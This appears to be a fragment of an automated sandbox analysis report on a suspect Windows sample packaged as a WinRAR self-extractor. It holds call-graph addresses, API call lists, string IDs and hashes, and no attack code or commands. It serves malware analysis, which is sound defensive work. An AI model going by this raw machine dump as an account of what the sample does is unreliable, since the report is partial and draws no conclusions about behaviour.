40922->40708 40923->40749 40924->40713 40926 408538 __write_nolock 40925->40926 40927 4091fc 2 API calls 40926->40927 40947 408552 _wcscpy 40927->40947 40928 408693 40929 4086a7 40928->40929 40930 4086e8 40928->40930 41099 40888d CreateFileW CreateFileW __write_nolock 40929->41099 41094 409212 40930->41094 40935 4086ae 40935->40930 40937 4086b2 40935->40937 40936 4092a1 7 API calls 40939 4086f6 40936->40939 40946 4086b6 40937->40946 40941 408706 40939->40941 40942 4086fd 40939->40942 40940 4091fc 2 API calls 40940->40947 41101 40903b 40941->41101 41100 40888d CreateFileW CreateFileW __write_nolock 40942->41100 40946->40721 40947->40928 40947->40940 40947->40946 41076 40835b 40947->41076 41097 40829e 60 API calls 3 library calls 40947->41097 41098 40e4a2 5 API calls 2 library calls 40947->41098 40948->40740 40949->40727 40950->40750 40951->40759 40952->40759 40953->40759 40954->40768 40956 40a0d8 40955->40956 40957 40a0de _wcsncpy 40956->40957 40959 411228 MultiByteToWideChar 40956->40959 40957->40829 40959->40957 40960->40837 40962 409099 __write_nolock 40961->40962 40963 408f98 2 API calls 40962->40963 40964 4090e8 40963->40964 40965 4091f3 40964->40965 40967 408fe4 2 API calls 40964->40967 40966 409109 CreateFileW 40965->40966 40968 40912e 40966->40968 40971 409169 40966->40971 40967->40966 40969 40914a CreateFileW 40968->40969 40970 4091ec 40968->40970 40969->40970 40969->40971 40970->40842 40972 4091d1 CloseHandle 40971->40972 40972->40970 40973 4091e1 40972->40973 40974 408fe4 2 API calls 40973->40974 40974->40970 40975->40864 40976->40846 40977->40872 40978->40876 40979->40867 40981 405f14 40980->40981 40990 405f55 ctype 40980->40990 40981->40990 40991 40cbab 73 API calls 40981->40991 40983 405f39 40992 4111e9 WideCharToMultiByte 40983->40992 40985 405f4d 40986 405f52 40985->40986 40987 405f9a 40985->40987 40986->40990 40993 405b87 73 API calls 5 library calls 40986->40993 40994 40569c 73 API calls 4 library calls 40987->40994 40990->40885 40991->40983 40992->40985 40993->40990 40994->40990 40996 408eaf 40995->40996 41000 408f0b 40995->41000 40997 408ecb 40996->40997 40999 408d5a 74 API calls 40996->40999 40998 408f01 GetLastError 40997->40998 40997->41000 40998->41000 40999->40997 41000->40888 41003 40b607 _realloc 41001->41003 41002 40b6ea 41002->40898 41003->41002 41012 40981a 75 API calls 41003->41012 41013 4181af 87 API calls 3 library calls 41003->41013 41007 40b78f 41006->41007 41009 40b775 _realloc 41006->41009 41007->41009 41014 408a00 41007->41014 41010 40b7be 41009->41010 41020 40981a 75 API calls 41009->41020 41010->40898 41012->41003 41013->41003 41015 408af5 41014->41015 41016 408a13 41014->41016 41015->41009 41016->41015 41018 408ae9 41016->41018 41021 4062fa 62 API calls 2 library calls 41016->41021 41022 406462 73 API calls 41018->41022 41020->41010 41021->41016 41022->41015 41023->40902 41024->40904 41027 417404 _memset 41025->41027 41044 41748f _realloc 41027->41044 41059 414f5b 39 API calls _memset 41027->41059 41028 41746a 41060 4119f5 41028->41060 41030 4119f5 89 API calls 41030->41044 41032 417558 41036 414655 79 API calls 41032->41036 41034 418143 41034->40914 41036->41034 41038 41814c 41071 412d82 72 API calls 41038->41071 41040 41315b 89 API calls 41040->41044 41044->41030 41044->41032 41044->41034 41044->41038 41044->41040 41047 414655 41044->41047 41067 412e4b 89 API calls 41044->41067 41068 413205 89 API calls 2 library calls 41044->41068 41069 41731e 89 API calls 2 library calls 41044->41069 41070 41720e 89 API calls 2 library calls 41044->41070 41045->40914 41046->40914 41048 41495d 41047->41048 41057 414682 _realloc 41047->41057 41073 413b42 79 API calls 41048->41073 41050 41496a 41050->41044 41052 40a8fb __VEC_memcpy 41052->41057 41053 401c3c 76 API calls 41053->41057 41054 40b75c 79 API calls 41054->41057 41055 4131a3 76 API calls 41055->41057 41056 411d76 39 API calls 41056->41057 41057->41048 41057->41050 41057->41052 41057->41053 41057->41054 41057->41055 41057->41056 41058 414636 39 API calls 41057->41058 41072 413b42 79 API calls 41057->41072 41058->41057 41059->41028 41061 411a09 41060->41061 41065 411a05 41060->41065 41064 411a21 41061->41064 41074 41bef0 __VEC_memcpy 41061->41074 41063 40b5f4 89 API calls 41063->41065 41064->41063 41065->41034 41065->41044 41066 413205 89 API calls 2 library calls 41065->41066 41066->41044 41067->41044 41068->41044 41069->41044 41070->41044 41071->41032 41072->41057 41073->41050 41074->41064 41075->40916 41081 408365 __EH_prolog __write_nolock 41076->41081 41077 408466 41078 408492 MoveFileW 41077->41078 41088 408505 ctype 41077->41088 41079 4084ac 41078->41079 41078->41088 41083 4091fc 2 API calls 41079->41083 41080 40b8bd _swprintf 58 API calls 41080->41081 41081->41077 41081->41080 41082 4091fc 2 API calls 41081->41082 41081->41088 41082->41081 41084 4084c5 41083->41084 41085 4084c9 41084->41085 41086 4084db MoveFileW 41084->41086 41114 40888d CreateFileW CreateFileW __write_nolock 41085->41114 41086->41088 41089 4084ef 41086->41089 41088->40947 41091 408987 74 API calls 41089->41091 41090 4084d9 41090->41086 41092 4084fa 41091->41092 41107 4089d7 41092->41107 41095 408fe4 2 API calls 41094->41095 41096 4086ee 41095->41096 41096->40936 41097->40947 41098->40947 41099->40935 41100->40937 41102 419e00 __write_nolock 41101->41102 41103 409048 DeleteFileW 41102->41103 41104 409084 41103->41104 41105 40905e 41103->41105 41104->40946 41105->41104 41106 409076 DeleteFileW 41105->41106 41106->41104 41108 4089e0 41107->41108 41109 4089e4 41107->41109 41108->41088 41110 4089ef 41109->41110 41111 408987 74 API calls 41109->41111 41110->41108 41112 40903b 2 API calls 41110->41112 41111->41110 41113 4089fe 41112->41113 41113->41088 41114->41090 41116 4052d2 41115->41116 41117 401974 41115->41117 41118 4197a3 ___free_lc_time 39 API calls 41116->41118 41117->40776 41118->41117 41120 40100b __EH_prolog 41119->41120 41127 4097b2 41120->41127 41122 401024 41123 4097b2 ctype 76 API calls 41122->41123 41124 401033 41123->41124 41125 4097b2 ctype 76 API calls 41124->41125 41126 401042 ctype 41125->41126 41126->40779 41130 410d9d 41127->41130 41129 4097c0 ctype 41129->41122 41131 410dcd ctype 41130->41131 41132 410da4 41130->41132 41131->41129 41132->41131 41134 410c85 41132->41134 41141 410c3e 41134->41141 41136 410cc9 RtlDeleteCriticalSection CloseHandle CloseHandle 41136->41131 41137 410c8f 41137->41136 41145 410b55 WaitForSingleObject 41137->41145 41139 410cbc CloseHandle 41139->41137 41140 410cc8 41139->41140 41140->41136 41142 410c5b 41141->41142 41144 410c81 41141->41144 41143 410b55 ctype 72 API calls 41142->41143 41143->41144 41144->41137 41146 410b66 GetLastError 41145->41146 41148 410b80 41145->41148 41149 4063a1 70 API calls 2 library calls 41146->41149 41148->41139 41149->41148 41151 4093c6 __write_nolock 41150->41151 41152 409448 41151->41152 41153 4093de FindFirstFileW 41151->41153 41155 409455 GetLastError 41152->41155 41158 40942c 41152->41158 41154 4093f5 41153->41154 41153->41158 41156 409421 GetLastError 41154->41156 41157 409409 FindFirstFileW 41154->41157 41155->41158 41156->41158 41157->41156 41157->41158 41158->40657 41160 414d9e __EH_prolog 41159->41160 41181 41499f 41160->41181 41162 414db1 41163 410d9d ctype 76 API calls 41162->41163 41164 414dc5 41163->41164 41165 414ddc 41164->41165 41166 41310f 39 API calls 41164->41166 41167 4052cc ctype 39 API calls 41165->41167 41166->41165 41168 414de7 41167->41168 41169 4052cc ctype 39 API calls 41168->41169 41170 414df2 41169->41170 41171 4052cc ctype 39 API calls 41170->41171 41172 414dfd 41171->41172 41173 4116c9 39 API calls 41172->41173 41174 414e26 41173->41174 41175 4052cc ctype 39 API calls 41174->41175 41176 414e2e 41175->41176 41177 4052cc ctype 39 API calls 41176->41177 41178 414e36 41177->41178 41179 4052cc ctype 39 API calls 41178->41179 41180 414e3e 41179->41180 41180->40539 41190 411d76 39 API calls ___free_lc_time 41181->41190 41183 4149ae 41184 4149dc 41183->41184 41191 414636 39 API calls ctype 41183->41191 41192 411d76 39 API calls ___free_lc_time 41184->41192 41187 4149e7 41188 414a0e 41187->41188 41193 414636 39 API calls ctype 41187->41193 41190->41183 41191->41183 41192->41187 41193->41187 41194->40454 41196 408867 76 API calls 41195->41196 41197 401a0f 41196->41197 41198 401a13 41197->41198 41199 4013a2 83 API calls 41197->41199 41206 4016ce 41198->41206 41200 401a20 41199->41200 41200->41198 41201 40c05e 61 API calls 41200->41201 41202 401a2e 41201->41202 41215 40df6e 70 API calls 2 library calls 41202->41215 41204 401a38 41205 408987 74 API calls 41204->41205 41205->41198 41207 4016d8 __EH_prolog 41206->41207 41208 401704 41207->41208 41210 40172a 41207->41210 41211 4016e9 41207->41211 41209 4035d7 83 API calls 41208->41209 41209->41211 41216 40369f 41210->41216 41211->40467 41211->40470 41215->41204 41219 4036a5 41216->41219 41217 4035d7 83 API calls 41217->41219 41218 401748 41218->41211 41220 401274 41218->41220 41219->41217 41219->41218 41221 40127e __EH_prolog 41220->41221 41237 402ba4 41221->41237 41223 4012a0 41224 4012a4 41223->41224 41225 4012b9 41223->41225 41227 4197a3 ___free_lc_time 39 API calls 41224->41227 41236 4012b1 41224->41236 41277 40123f 76 API calls 41225->41277 41227->41236 41228 4012c6 41278 40125a 76 API calls 41228->41278 41230 4012d4 41232 4012dd _wcslen 41230->41232 41279 411228 MultiByteToWideChar 41230->41279 41280 40125a 76 API calls 41232->41280 41234 401329 41235 4197a3 ___free_lc_time 39 API calls 41234->41235 41234->41236 41235->41236 41236->41211 41238 402bae __EH_prolog __write_nolock 41237->41238 41239 402bc6 41238->41239 41243 402bed 41238->41243 41240 40c05e 61 API calls 41239->41240 41241 402bd0 41240->41241 41281 40df6e 70 API calls 2 library calls 41241->41281 41242 40c05e 61 API calls 41245 402e47 41242->41245 41246 402bda 41243->41246 41248 414c9d 73 API calls 41243->41248 41272 402e38 41243->41272 41286 40df6e 70 API calls 2 library calls 41245->41286 41246->41223 41249 402c4f 41248->41249 41250 416d42 72 API calls 41249->41250 41254 402c66 41250->41254 41251 402cab 41283 401c3c 76 API calls 41251->41283 41253 402c81 41256 40c05e 61 API calls 41253->41256 41254->41251 41254->41253 41258 402cbb 41254->41258 41255 402c95 41257 414d94 76 API calls 41255->41257 41260 402c8b 41256->41260 41257->41246 41258->41255 41259 40b7c9 74 API calls 41258->41259 41261 402d27 41258->41261 41259->41261 41282 40df6e 70 API calls 2 library calls 41260->41282 41263 402db1 41261->41263 41264 402da7 41261->41264 41266 41816c 90 API calls 41263->41266 41265 40730f 90 API calls 41264->41265 41267 402daf 41265->41267 41266->41267 41268 402e29 41267->41268 41269 402dea 41267->41269 41270 414d94 76 API calls 41268->41270 41271 40c05e 61 API calls 41269->41271 41270->41272 41273 402dfb 41271->41273 41272->41242 41284 40df6e 70 API calls 2 library calls 41273->41284 41275 402e05 41275->41255 41285 411d76 39 API calls ___free_lc_time 41275->41285 41277->41228 41278->41230 41279->41232 41280->41234 41281->41246 41282->41255 41283->41258 41284->41275 41285->41255 41286->41246 41287 22a8c24 GetStartupInfoW 41288 22a8c41 41287->41288 41289 22a8cd5 41287->41289 41288->41289 41293 22acae3 41288->41293 41291 22a8c69 41291->41289 41292 22a8c99 GetFileType 41291->41292 41292->41291 41294 22acaef ___scrt_is_nonwritable_in_current_image 41293->41294 41295 22acaf8 41294->41295 41296 22acb19 41294->41296 41314 22a729d 14 API calls __dosmaperr 41295->41314 41306 22a8e5b RtlEnterCriticalSection 41296->41306 41299 22acafd 41315 22a713e 25 API calls __cftof 41299->41315 41301 22acb07 41301->41291 41302 22acb51 41316 22acb78 RtlLeaveCriticalSection __fassign 41302->41316 41304 22acb25 41304->41302 41307 22aca33 41304->41307 41306->41304 41317 22a79d8 41307->41317 41309 22aca52 41311 22a7a35 _free 14 API calls 41309->41311 41310 22aca45 41310->41309 41324 22a889f 6 API calls __dosmaperr 41310->41324 41313 22acaa7 41311->41313 41313->41304 41314->41299 41315->41301 41316->41301 41318 22a79e5 __dosmaperr 41317->41318 41319 22a7a25 41318->41319 41320 22a7a10 RtlAllocateHeap 41318->41320 41325 22abf21 RtlEnterCriticalSection RtlLeaveCriticalSection __dosmaperr 41318->41325 41326 22a729d 14 API calls __dosmaperr 41319->41326 41320->41318 41321 22a7a23 41320->41321 41321->41310 41324->41310 41325->41318 41326->41321 41327 468656 41328 46865b 41327->41328 41329 4d0fdc 2 API calls 41328->41329 41330 468673 41329->41330 41331 4686e4 41330->41331 41334 4d103c NtFreeVirtualMemory 41330->41334 41333 4686ba 41334->41333 41335 4fafbd 41336 468983 41335->41336 41339 4f0543 41336->41339 41340 4d103c NtFreeVirtualMemory 41336->41340 41338 46898c 41339->41339 41340->41338 41341 40eb56 41342 40eb5c 41341->41342 41346 40e570 _wcscat _wcslen _wcsrchr _wcscpy 41341->41346 41342->41346 41362 40e139 41342->41362 41343 40f0f8 41346->41343 41347 419831 _realloc 42 API calls 41346->41347 41349 4197a3 ___free_lc_time 39 API calls 41346->41349 41355 40ea2d GetDlgItem 41346->41355 41358 40ea47 SendMessageW 41346->41358 41360 40ea6e SendMessageW 41346->41360 41361 40e660 _memset _wcslen 41346->41361 41379 409551 FindFirstFileW FindFirstFileW GetLastError GetLastError 41346->41379 41382 40d600 72 API calls 5 library calls 41346->41382 41347->41346 41349->41346 41350 40e665 SetFileAttributesW 41351 40e723 GetFileAttributesW 41350->41351 41350->41361 41353 40e731 DeleteFileW 41351->41353 41351->41361 41353->41361 41355->41346 41356 40b8bd _swprintf 58 API calls 41357 40e763 GetFileAttributesW 41356->41357 41359 40e774 MoveFileW 41357->41359 41357->41361 41358->41346 41359->41361 41360->41346 41361->41346 41361->41350 41361->41351 41361->41356 41380 40a544 58 API calls 4 library calls 41361->41380 41381 409551 FindFirstFileW FindFirstFileW GetLastError GetLastError 41361->41381 41365 40e146 _memset _wcslen __write_nolock 41362->41365 41363 40e398 41363->41346 41364 4091fc 2 API calls 41366 40e23b 41364->41366 41365->41363 41365->41364 41367 40a75f 2 API calls 41366->41367 41369 40e255 _wcscat _wcscpy 41366->41369 41367->41369 41368 40e2f7 41383 40d52a WaitForSingleObject WaitForSingleObject 41368->41383 41371 40e298 41369->41371 41372 4091fc 2 API calls 41369->41372 41370 40e339 CloseHandle 41375 40e348 41370->41375 41371->41363 41371->41368 41371->41370 41373 40e2ec ShowWindow 41371->41373 41372->41371 41373->41368 41375->41363 41376 40e391 ShowWindow 41375->41376 41376->41363 41377 40e30d 41377->41370 41378 40e334 41377->41378 41378->41370 41379->41346 41380->41361 41381->41361 41382->41346 41383->41377 41384 425b58 41389 40543a 41384->41389 41390 405444 __EH_prolog 41389->41390 41391 409db1 73 API calls 41390->41391 41392 405450 41391->41392 41405 410a21 39 API calls 41392->41405 41394 40545f 41406 410a21 39 API calls 41394->41406 41396 40546e 41407 410a21 39 API calls 41396->41407 41398 40547d 41408 410a21 39 API calls 41398->41408 41400 40548c 41409 410a21 39 API calls 41400->41409 41402 40549b 41410 4052df 39 API calls 41402->41410 41405->41394 41406->41396 41407->41398 41408->41400 41409->41402 41411 41cb5a 41412 41cb66 __msize 41411->41412 41413 41cbd9 41412->41413 41561 41cb31 39 API calls 3 library calls 41412->41561 41445 41ddba 41413->41445 41417 41cbea __RTC_Initialize 41473 4222d5 41417->41473 41420 41cbf8 41421 41cc03 41420->41421 41563 420456 39 API calls 3 library calls 41420->41563 41479 42219e 41421->41479 41424 41cc14 41496 4220e3 41424->41496 41427 41cc29 41506 421e6b 41427->41506 41431 41cc3a 41521 420515 41431->41521 41434 41cc41 41435 41cc4c 41434->41435 41566 420456 39 API calls 3 library calls 41434->41566 41527 421e0c 41435->41527 41440 41cc6d 41441 41cc7b 41440->41441 41558 4206c6 41440->41558 41567 4206f2 39 API calls _doexit 41441->41567 41444 41cc80 __msize 41446 41ddc9 __onexit_nolock 41445->41446 41447 41df3d 41446->41447 41448 41dddf GetProcAddress GetProcAddress GetProcAddress GetProcAddress 41446->41448 41574 41dad4 42 API calls 2 library calls 41447->41574 41451 41de28 41448->41451 41450 41cbdf 41450->41417 41562 41cb31 39 API calls 3 library calls 41450->41562 41451->41450 41452 41de76 TlsSetValue 41451->41452 41452->41450 41453 41de87 41452->41453 41568 420710 3 API calls 4 library calls 41453->41568 41455 41de8c 41456 41d9aa __onexit_nolock 3 API calls 41455->41456 41457 41de97 41456->41457 41458 41d9aa __onexit_nolock 3 API calls 41457->41458 41459 41dea7 41458->41459 41460 41d9aa __onexit_nolock 3 API calls 41459->41460 41461 41deb7 41460->41461 41462 41d9aa __onexit_nolock 3 API calls 41461->41462 41463 41dec7 41462->41463 41463->41447 41464 41da25 _raise 3 API calls 41463->41464 41465 41dee8 41464->41465 41465->41447 41569 4202e9 41465->41569 41468 41da25 _raise 3 API calls 41469 41df1b 41468->41469 41469->41447 41470 41df22 41469->41470 41573 41db11 39 API calls 4 library calls 41470->41573 41472 41df2a 41472->41450 41474 4222e1 __msize 41473->41474 41475 4202e9 __setenvp 39 API calls 41474->41475 41476 422302 41475->41476 41477 4223ea __msize __mtinitlocknum 41476->41477 41478 4202e9 __setenvp 39 API calls 41476->41478 41477->41420 41478->41476 41480 4221bc GetEnvironmentStringsW 41479->41480 41483 4221db 41479->41483 41481 4221d0 GetLastError 41480->41481 41482 4221c4 41480->41482 41481->41483 41484 422206 WideCharToMultiByte 41482->41484 41485 4221f7 GetEnvironmentStringsW 41482->41485 41483->41482 41490 422274 41483->41490 41487 42223a 41484->41487 41495 4221ff _realloc 41484->41495 41485->41484 41485->41495 41591 4202a4 39 API calls _malloc 41487->41591 41489 422240 41491 422248 WideCharToMultiByte 41489->41491 41489->41495 41490->41495 41592 4202a4 39 API calls _malloc 41490->41592 41493 42225a 41491->41493 41491->41495 41494 4197a3 ___free_lc_time 39 API calls 41493->41494 41494->41495 41495->41424 41497 4220f8 41496->41497 41499 4220fd 41496->41499 41599 42140c 76 API calls __setmbcp 41497->41599 41593 421f49 41499->41593 41501 41cc1e 41501->41427 41564 420456 39 API calls 3 library calls 41501->41564 41504 422166 41504->41501 41505 421f49 _parse_cmdline 49 API calls 41504->41505 41505->41501 41507 421e74 41506->41507 41511 421e79 _strlen 41506->41511 41602 42140c 76 API calls __setmbcp 41507->41602 41509 41cc2f 41509->41431 41565 420456 39 API calls 3 library calls 41509->41565 41510 4202e9 __setenvp 39 API calls 41512 421eae _strlen 41510->41512 41511->41509 41511->41510 41512->41509 41513 421f0c 41512->41513 41515 4202e9 __setenvp 39 API calls 41512->41515 41516 421f32 41512->41516 41519 421ef3 41512->41519 41603 422b6d 39 API calls __wctomb_s_l 41512->41603 41514 4197a3 ___free_lc_time 39 API calls 41513->41514 41514->41509 41515->41512 41517 4197a3 ___free_lc_time 39 API calls 41516->41517 41517->41509 41519->41512 41604 41f3ac 6 API calls 3 library calls 41519->41604 41523 420523 __IsNonwritableInCurrentImage 41521->41523 41605 4237f0 41523->41605 41524 420541 __initterm_e 41525 41bb4b __cinit 42 API calls 41524->41525 41526 420560 __IsNonwritableInCurrentImage __initterm 41524->41526 41525->41526 41526->41434 41528 421e1a 41527->41528 41530 421e1f 41527->41530 41609 42140c 76 API calls __setmbcp 41528->41609 41532 41cc52 41530->41532 41610 4249cf 49 API calls x_ismbbtype_l 41530->41610 41533 40fbd4 41532->41533 41611 410ad1 41533->41611 41535 40fbe4 41616 411624 GetCPInfo 41535->41616 41537 40fbf7 _memset 41542 40fc7a 41537->41542 41630 40d31e 73 API calls 41537->41630 41539 40fc6f CloseHandle 41539->41542 41540 40fc1f 41540->41539 41541 40fc4f _realloc 41540->41541 41540->41542 41541->41539 41618 419308 LoadLibraryW LoadLibraryW 41542->41618 41544 40fce4 41620 40c047 41544->41620 41546 40fcef 41547 40fd10 DialogBoxParamW 41546->41547 41548 40fd4a 41547->41548 41625 419362 41548->41625 41550 40fd5a 41551 40fd85 DeleteObject 41550->41551 41552 4197a3 ___free_lc_time 39 API calls 41550->41552 41553 40fd9c DeleteObject 41551->41553 41554 40fd9f 41551->41554 41555 40fd84 41552->41555 41553->41554 41556 40d52a WaitForSingleObject WaitForSingleObject 41554->41556 41557 40fdd4 41554->41557 41555->41551 41556->41557 41557->41440 41664 42059a 41558->41664 41560 4206d7 41560->41441 41561->41413 41562->41417 41563->41421 41564->41427 41565->41431 41566->41435 41567->41444 41568->41455 41572 4202f2 41569->41572 41571 41df01 41571->41447 41571->41468 41572->41571 41575 4239f5 41572->41575 41573->41472 41574->41450 41576 423a01 __msize 41575->41576 41577 423a19 41576->41577 41586 423a38 _memset __calloc_impl 41576->41586 41587 41e06e 39 API calls __getptd 41577->41587 41579 423a1e 41588 41f4d4 TlsGetValue TlsGetValue GetProcAddress __invoke_watson _raise 41579->41588 41580 423aaa RtlAllocateHeap 41580->41586 41582 423a2e __msize 41582->41572 41584 41e263 __msize 38 API calls 41584->41586 41586->41580 41586->41582 41586->41584 41589 41ea75 RtlAllocateHeap ___sbh_alloc_block 41586->41589 41590 41ef5b TlsGetValue TlsGetValue GetProcAddress _raise 41586->41590 41587->41579 41589->41586 41590->41586 41591->41489 41592->41495 41596 421f68 41593->41596 41595 421fd5 41597 4220d3 41595->41597 41598 4249cf 49 API calls __wincmdln 41595->41598 41596->41595 41601 4249cf 49 API calls x_ismbbtype_l 41596->41601 41597->41501 41600 4202a4 39 API calls _malloc 41597->41600 41598->41595 41599->41499 41600->41504 41601->41596 41602->41511 41603->41512 41604->41519 41606 4237f6 41605->41606 41607 41d9aa __onexit_nolock 3 API calls 41606->41607 41608 42380e 41606->41608 41607->41606 41608->41524 41609->41530 41610->41530 41612 410adb 41611->41612 41613 410ae0 GetProcAddress 41612->41613 41614 410b02 41612->41614 41613->41614 41615 410af0 41613->41615 41614->41535 41615->41614 41617 411648 41616->41617 41617->41537 41619 419338 41618->41619 41619->41544 41631 40b8d9 41620->41631 41622 40c053 41651 40bd95 41622->41651 41624 40c05a 41624->41546 41626 419372 FreeLibrary 41625->41626 41627 419375 41625->41627 41626->41627 41628 41937c FreeLibrary 41627->41628 41629 41937f 41627->41629 41628->41629 41630->41540 41632 40b8e3 _wcsrchr _wcscpy __EH_prolog _wcschr __write_nolock 41631->41632 41633 408750 3 API calls 41632->41633 41650 40b963 ctype 41632->41650 41644 40b95f _strncmp 41633->41644 41634 40ba99 41636 408f44 75 API calls 41634->41636 41634->41650 41635 408b00 74 API calls 41635->41644 41637 40bab5 41636->41637 41638 41c2de _malloc 39 API calls 41637->41638 41640 40babf 41638->41640 41640->41650 41661 408dd2 75 API calls 41640->41661 41643 40badb 41645 41c2de _malloc 39 API calls 41643->41645 41643->41650 41644->41634 41644->41635 41644->41650 41655 408dd2 75 API calls 41644->41655 41656 408f44 41644->41656 41646 40baf5 41645->41646 41646->41650 41662 411228 MultiByteToWideChar 41646->41662 41648 40bb16 41649 4197a3 ___free_lc_time 39 API calls 41648->41649 41649->41650 41650->41622 41652 40bda9 41651->41652 41653 40bbc4 59 API calls 41652->41653 41654 40bdbd 41652->41654 41653->41654 41654->41624 41655->41644 41657 408ea2 75 API calls 41656->41657 41658 408f58 41657->41658 41659 408f6f 41658->41659 41663 406372 73 API calls ctype 41658->41663 41659->41644 41661->41643 41662->41648 41663->41659 41665 4205a6 __msize 41664->41665 41666 41e263 __msize 39 API calls 41665->41666 41667 4205ad 41666->41667 41668 41da25 _raise 3 API calls 41667->41668 41671 420666 _doexit __initterm 41667->41671 41669 4205e4 41668->41669 41669->41671 41672 41da25 _raise 3 API calls 41669->41672 41670 4206ae __msize 41670->41560 41671->41670 41673 4204aa _doexit GetProcAddress 41671->41673 41675 4205f9 41672->41675 41673->41670 41674 41da1c TlsGetValue TlsGetValue GetProcAddress _raise 41674->41675 41675->41671 41675->41674 41676 41da25 TlsGetValue TlsGetValue GetProcAddress _raise 41675->41676 41676->41675

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetCurrentThread.KERNEL32 ref: 02291C7C
                                                                                                                • GetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02291F8A,00000000,00000000), ref: 02291C7F
                                                                                                                • GetCurrentThread.KERNEL32 ref: 02291C8B
                                                                                                                • SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02291F8A,00000000,00000000), ref: 02291C8E
                                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,02291F8A,00000000,00000000), ref: 02291C94
                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,?,?,?,?,02291F8A,00000000,00000000), ref: 02291C9D
                                                                                                                • Thread32First.KERNEL32(00000000,?), ref: 02291CC7
                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 02291CD5
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 02291CE1
                                                                                                                • Thread32Next.KERNEL32(00000000,0000001C), ref: 02291CFC
                                                                                                                • Thread32First.KERNEL32(00000000,0000001C), ref: 02291D3E
                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 02291D50
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 02291D5C
                                                                                                                • Thread32Next.KERNEL32(00000000,0000001C), ref: 02291D97
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02291DB1
                                                                                                                • GetCurrentThread.KERNEL32 ref: 02291DBC
                                                                                                                • SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02291F8A,00000000,00000000), ref: 02291DBF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentThread$Thread32$PriorityProcess$FirstNext$CloseCreateHandleSnapshotToolhelp32
                                                                                                                • String ID: kL
                                                                                                                • API String ID: 2145368864-2496334608
                                                                                                                • Opcode ID: 4dab244311c8a4d79d79bfe3cbe15cdeb414b050d9d7db6311c10b9c5f1ef8d4
                                                                                                                • Instruction ID: 36a96b6760b0ba38d7c3f8fc475d35a9bfa26aecd44c0bdb4900a0013b6ab81d
                                                                                                                • Opcode Fuzzy Hash: 4dab244311c8a4d79d79bfe3cbe15cdeb414b050d9d7db6311c10b9c5f1ef8d4
                                                                                                                • Instruction Fuzzy Hash: 47416A719543029FDB10EFE6E848A2ABBB8EF88795F044D29F995C2144E730C925DB62

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00410AD1: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00410AE6
                                                                                                                  • Part of subcall function 00411624: GetCPInfo.KERNEL32(00000000,00000000,?,?,00000000,00000001), ref: 00411635
                                                                                                                • _memset.LIBCMT ref: 0040FC04
                                                                                                                • CloseHandle.KERNEL32(?,00000004,00000000,winrarsfxmappingfile.tmp), ref: 0040FC72
                                                                                                                • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,0040F34C,00000000), ref: 0040FD30
                                                                                                                • DeleteObject.GDI32 ref: 0040FD91
                                                                                                                • DeleteObject.GDI32(?), ref: 0040FD9D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DeleteObject$AddressCloseDialogHandleInfoParamProc_memset
                                                                                                                • String ID: STARTDLG$lB$sfxcmd$sfxname$winrarsfxmappingfile.tmp$xB
                                                                                                                • API String ID: 1958261340-3440985015
                                                                                                                • Opcode ID: 63d67b826d98dcd49d227b18b0a4d81c0078cb04adbf65ed0c8ee994f698998d
                                                                                                                • Instruction ID: a539fbd58235541fe969ffb0acdfd90942c83428e348c821cb19171fb0839507
                                                                                                                • Opcode Fuzzy Hash: 63d67b826d98dcd49d227b18b0a4d81c0078cb04adbf65ed0c8ee994f698998d
                                                                                                                • Instruction Fuzzy Hash: A45195B0A41215EAD720FBB2AC86E9E7A69EF41708B50143FF501B32D2DA7C5945CB1D

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
